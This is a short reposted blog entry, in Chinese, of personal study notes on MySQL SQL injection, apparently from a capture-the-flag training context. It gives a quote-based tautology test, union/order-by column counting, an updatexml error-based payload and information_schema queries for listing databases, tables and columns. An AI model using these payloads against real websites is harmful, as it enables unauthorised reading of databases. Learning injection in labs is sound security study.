mysql注入个人学习笔记

71 阅读 0 评论 47 点赞

我是靠谱客的博主眼睛大电源，最近开发中收集的这篇文章主要介绍mysql注入个人学习笔记，觉得挺不错的，现在分享给大家，希望可以做个参考。

整数型字注入：

1.判断数字型还是字符型（加引号）id=‘1’ or ‘1’=‘1’

不是的话单引号不会完全闭合

2.查字段数 union select1，2，3 order by

3.查询数据库表字段hackbar-load

报错注入：

select updatexml(1,concat(0x7e,(select version())0x7e),1)

布尔盲注

时间盲注

select schema_name from information_schema.schemata

select group_concat(table_name)from information_schema.tables where table_schema=' '

select group_concat(column_name)from information_schema.columns where table_schema=' ' and table_name=' '

（图片来源河北师范大学sourcecode战队）

以上就是眼睛大电源为你收集整理的mysql注入个人学习笔记的全部内容，希望文章能够帮你解决mysql注入个人学习笔记所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供，作为学习参考使用，或来自网络收集整理，版权属于原作者所有。